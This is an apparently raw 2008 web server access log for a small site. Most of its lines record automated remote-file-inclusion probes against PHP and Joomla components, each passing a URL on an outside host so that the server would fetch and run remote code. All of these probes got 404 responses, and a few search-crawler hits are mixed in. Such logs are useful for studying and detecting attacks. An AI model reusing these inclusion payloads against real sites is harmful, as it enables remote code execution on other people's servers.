208.186.169.183 - - [25/Jan/2008:04:00:56 -0800] "GET /logs/access_071225.log/include/write.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.25.23 - - [25/Jan/2008:04:01:19 -0800] "GET /mobileoffice/?M=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:01:52 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:01:52 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:01:53 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:01:53 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:04:02:00 -0800] "GET /logs/access_071225.log//include/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [25/Jan/2008:04:02:10 -0800] "GET //skin/zero_vote/login.php?dir=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.0.39 - - [25/Jan/2008:04:02:12 -0800] "GET /logs/access_071225.log/include/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [25/Jan/2008:04:02:28 -0800] "GET /logs/access_071225.log//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [25/Jan/2008:04:02:29 -0800] "GET //cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.27.136 - - [25/Jan/2008:04:02:29 -0800] "GET /logs//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:04:02:32 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:04:02:33 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:04:02:33 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:02:48 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:02:49 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:02:49 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:02:49 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:04:03:14 -0800] "GET /logs/access_071225.log//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:04:03:15 -0800] "GET //cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:04:03:15 -0800] "GET /logs//cms/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.60.207.171 - - [25/Jan/2008:04:03:19 -0800] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:03:36 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:03:36 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:03:36 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:03:36 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:03:48 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:03:49 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:03:49 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:03:49 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
87.238.199.66 - - [25/Jan/2008:04:03:53 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.crewfuck.kit.net/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:04:03:56 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:04:03:56 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:04:03:56 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:04:04:21 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:04:04:21 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:04:04:21 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:04:22 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:04:22 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:04:22 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:04:23 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:04:04:37 -0800] "GET /logs/access_071221.log//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:04:04:42 -0800] "GET /logs/access_080106.log//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:04:04:42 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:04:04:42 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:04:04:45 -0800] "GET /logs/access_080106.log//components/com_simpleboard/image_upload.php?sbp=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:04:04:45 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:04:04:45 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:04:04:49 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:04:04:50 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:04:04:50 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:04:04:50 -0800] "GET /logs/access_071221.log//components/com_simpleboard/image_upload.php?sbp=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.213.31 - - [25/Jan/2008:04:04:58 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.31 - - [25/Jan/2008:04:05:03 -0800] "GET /bikes/IMG_1191.jpg HTTP/1.0" 200 3985937 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
134.129.197.99 - - [25/Jan/2008:04:05:30 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:06:13 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:06:14 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:06:18 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.44.246.45 - - [25/Jan/2008:04:06:21 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:06:30 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:06:30 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:06:30 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:06:30 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:04:06:49 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:04:07:04 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:04:07:06 -0800] "GET /logs/access_071229.log//include/write.php?dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:04:07:06 -0800] "GET //include/write.php?dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [25/Jan/2008:04:07:07 -0800] "GET /logs//include/write.php?dir=http://www.lammera.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:07:20 -0800] "GET /logs/scanhttp://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:07:21 -0800] "GET /logs/scanhttp://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:07:21 -0800] "GET /scanhttp://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:07:21 -0800] "GET /scanhttp://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:07:23 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:07:24 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:07:24 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:07:24 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:07:25 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:07:25 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:07:25 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.199.227.230 - - [25/Jan/2008:04:07:26 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:07:59 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:08:00 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:08:00 -0800] "GET /logs/scanhttp://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:08:00 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
161.132.77.16 - - [25/Jan/2008:04:08:00 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:08:00 -0800] "GET /logs/scanhttp://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:08:02 -0800] "GET /scanhttp://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:08:02 -0800] "GET /scanhttp://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:08:43 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:08:45 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:08:46 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:08:53 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:10:04 -0800] "GET /logs/scanhttp://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:10:04 -0800] "GET /logs/scanhttp://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
8.6.223.16 - - [25/Jan/2008:04:10:04 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.boscolab.cl//boscolab_imagenes/donbosco2006_08.gif?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:10:06 -0800] "GET /scanhttp://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.140.237 - - [25/Jan/2008:04:10:08 -0800] "GET /scanhttp://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:10:41 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:10:41 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:10:42 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.21.63.146 - - [25/Jan/2008:04:10:43 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.7.198.72 - - [25/Jan/2008:04:11:54 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:12:00 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:12:00 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:12:00 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
86.109.103.76 - - [25/Jan/2008:04:12:01 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.durere.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
